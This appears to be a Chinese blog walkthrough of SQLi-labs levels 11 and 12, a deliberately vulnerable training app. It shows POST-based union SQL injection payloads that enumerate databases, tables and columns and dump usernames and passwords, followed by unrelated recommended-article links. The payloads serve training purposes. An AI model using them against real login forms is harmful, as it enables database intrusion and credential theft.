SQLI-labs-第十一关和第十二关

目录

第十一关

1、判断注入点

2、判断字段值

3、爆库名

4、爆表名

5、爆字段名,以users表为例

6、爆值

第十二关

1、判断注入点

知识点:POST方式联合查询注入

第十一关

思路:

1、判断注入点

我们随便输入一个用户名和密码,使用Burpsuite抓包

抓到的包发送到repeater模块,查看正常回显是什么内容

这里有uname和passwd两个值,这两个都可能是注入点,我们都可以尝试一下

首先在uname的值加上单引号'

数据库语句报错,在passwd同理

说明这两个字段都存在注入点

判断注入点属于什么类型

输入uname=admin' and 1=1#

回显正常

输入uname=admin' and 1=2#

结果没有回显,说明这个注入点是单引号闭合错误的注入漏洞

2、判断字段值

使用order by 语句

uname=admin' order by 1#

从1开始尝试,试到3的时候报错,说明当前表的字段有2个

3、爆库名

做到这一步的时候,发现在uname这个点注入是没有回显信息的,只显示了正常的数据。需要在passwd这点注入才会回显,因为我们在最后加入了注释符#,会把passwd这个字段的值給注释掉,导致没有数据的正常回显。

使用联合查询语句 union

uname=admin&passwd=1' union select 1,database() #

4、爆表名

使用group_concat()函数

uname=admin&passwd=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

5、爆字段名,以users表为例

uname=admin&passwd=1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' #

6、爆值

使用concat_ws函数

uname=admin&passwd=1' union select 1,concat_ws(',',id,username,password) from security.users limit 0,1 #

通过修改limit 后面的值,就可以得到全部信息


第十二关

第十二关的思路跟第十一关的一样,只不过是双引号的闭合问题

1、判断注入点

接下来的步骤参考上面


这篇文章就写到这里,哪里有疑问或不足的欢迎指出!

相关推荐
阿成学长_Cain6 小时前
Linux ipcs 命令超全详解:查看共享内存 / 消息队列 / 信号量,IPC 运维必备
linux·运维·服务器·网络·数据库
OceanBase数据库官方博客8 小时前
OceanBase AI 时代,数据库的变与不变(技术解析与实践)
数据库·人工智能·oceanbase
阿成学长_Cain9 小时前
Linux dirs命令详解|Bash目录堆栈管理快速切换目录实战教程
linux·运维·前端·数据库
ywl4708120879 小时前
Mysql 平衡二叉树、红黑树、B树、B+树区别以及应用场景(五)
数据库·b树·mysql
IvorySQL10 小时前
IvorySQL Agent 探索与实践
数据库·人工智能·postgresql·oracle·ivorysql
SelectDB11 小时前
美团数十 PB 规模 Apache Doris 实践:从统一 OLAP 到 AI-Native 数据基座
大数据·数据库·性能优化
Database_Cool_11 小时前
阿里云RDS主从延迟解决方案_只读实例半同步复制最佳实践
数据库·人工智能
HackTwoHub12 小时前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
KaMeidebaby12 小时前
卡梅德生物技术快报|小 RNA 适配体合成 + 多方法亲和力表征全流程标准化操作手册
前端·网络·数据库·人工智能·算法
卓怡学长12 小时前
w269基于spring boot + vue 候鸟监测数据管理系统
java·数据库·spring boot·spring·intellij-idea